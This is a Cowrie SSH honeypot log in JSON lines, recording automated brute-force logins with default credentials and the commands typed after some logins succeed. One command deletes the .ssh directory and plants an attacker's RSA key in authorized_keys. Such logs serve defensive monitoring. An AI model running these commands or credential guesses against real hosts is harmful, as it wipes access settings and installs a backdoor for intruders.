{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:04:48.885504Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.886218Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.887617Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.983738Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:04:49.181121Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.181883Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.274487Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.275370Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":39718,"dst_ip":"1.2.3.4","dst_port":22,"session":"493122859a48","protocol":"ssh","message":"New connection: 199.195.248.191:39718 (1.2.3.4:22) [session: 493122859a48]","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.359432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.361161Z","src_ip":"199.195.248.191","session":"493122859a48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.450845Z","src_ip":"199.195.248.191","session":"493122859a48"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:04:49.798306Z","src_ip":"199.195.248.191","session":"493122859a48"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:50.892156Z","src_ip":"199.195.248.191","session":"493122859a48"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":40254,"dst_ip":"1.2.3.4","dst_port":22,"session":"61c323314a22","protocol":"ssh","message":"New connection: 199.195.248.191:40254 (1.2.3.4:22) [session: 61c323314a22]","sensor":"my-vps","timestamp":"2025-08-26T20:04:50.977406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:04:50.985821Z","src_ip":"199.195.248.191","session":"61c323314a22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:04:51.076454Z","src_ip":"199.195.248.191","session":"61c323314a22"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:04:51.425346Z","src_ip":"199.195.248.191","session":"61c323314a22"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:51.514056Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:51.515062Z","src_ip":"199.195.248.191","session":"61c323314a22"}
{"eventid":"cowrie.session.connect","src_ip":"31.169.126.45","src_port":35472,"dst_ip":"1.2.3.4","dst_port":22,"session":"467780ea0197","protocol":"ssh","message":"New connection: 31.169.126.45:35472 (1.2.3.4:22) [session: 467780ea0197]","sensor":"my-vps","timestamp":"2025-08-26T20:04:55.856977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:04:55.858395Z","src_ip":"31.169.126.45","session":"467780ea0197"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T20:04:55.875904Z","src_ip":"31.169.126.45","session":"467780ea0197"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":53344,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b1d1a8fc1ba","protocol":"ssh","message":"New connection: 217.154.1.158:53344 (1.2.3.4:22) [session: 3b1d1a8fc1ba]","sensor":"my-vps","timestamp":"2025-08-26T20:04:56.549131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:04:56.550177Z","src_ip":"217.154.1.158","session":"3b1d1a8fc1ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:04:56.564888Z","src_ip":"217.154.1.158","session":"3b1d1a8fc1ba"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:04:56.649881Z","src_ip":"217.154.1.158","session":"3b1d1a8fc1ba"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:57.666206Z","src_ip":"217.154.1.158","session":"3b1d1a8fc1ba"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:05:03.858261Z","src_ip":"31.169.126.45","session":"467780ea0197"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":50866,"dst_ip":"1.2.3.4","dst_port":22,"session":"938e8cfc33cc","protocol":"ssh","message":"New connection: 217.154.1.158:50866 (1.2.3.4:22) [session: 938e8cfc33cc]","sensor":"my-vps","timestamp":"2025-08-26T20:05:14.038907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:05:14.039574Z","src_ip":"217.154.1.158","session":"938e8cfc33cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:05:14.053845Z","src_ip":"217.154.1.158","session":"938e8cfc33cc"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T20:05:14.097092Z","src_ip":"217.154.1.158","session":"938e8cfc33cc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:05:15.113390Z","src_ip":"217.154.1.158","session":"938e8cfc33cc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56070,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e38b52635da","protocol":"ssh","message":"New connection: 217.154.1.158:56070 (1.2.3.4:22) [session: 3e38b52635da]","sensor":"my-vps","timestamp":"2025-08-26T20:05:31.554573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:05:31.555808Z","src_ip":"217.154.1.158","session":"3e38b52635da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:05:31.569708Z","src_ip":"217.154.1.158","session":"3e38b52635da"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:05:31.613355Z","src_ip":"217.154.1.158","session":"3e38b52635da"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:05:32.631041Z","src_ip":"217.154.1.158","session":"3e38b52635da"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51366,"dst_ip":"1.2.3.4","dst_port":22,"session":"d057328ca15d","protocol":"ssh","message":"New connection: 217.154.1.158:51366 (1.2.3.4:22) [session: d057328ca15d]","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.120102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.120876Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.135024Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.178203Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:05:49.226776Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.227536Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.243063Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:05:49.244279Z","src_ip":"217.154.1.158","session":"d057328ca15d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":37750,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cebd2019ccf","protocol":"ssh","message":"New connection: 199.195.248.191:37750 (1.2.3.4:22) [session: 2cebd2019ccf]","sensor":"my-vps","timestamp":"2025-08-26T20:05:51.340075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:05:51.355186Z","src_ip":"199.195.248.191","session":"2cebd2019ccf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:05:51.440479Z","src_ip":"199.195.248.191","session":"2cebd2019ccf"}
{"eventid":"cowrie.login.failed","username":"user","password":"Qwerty123","message":"login attempt [user/Qwerty123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:05:51.803031Z","src_ip":"199.195.248.191","session":"2cebd2019ccf"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:05:52.903252Z","src_ip":"199.195.248.191","session":"2cebd2019ccf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62884,"dst_ip":"1.2.3.4","dst_port":22,"session":"308387295176","protocol":"ssh","message":"New connection: 217.72.205.35:62884 (1.2.3.4:22) [session: 308387295176]","sensor":"my-vps","timestamp":"2025-08-26T20:06:05.495476Z"}
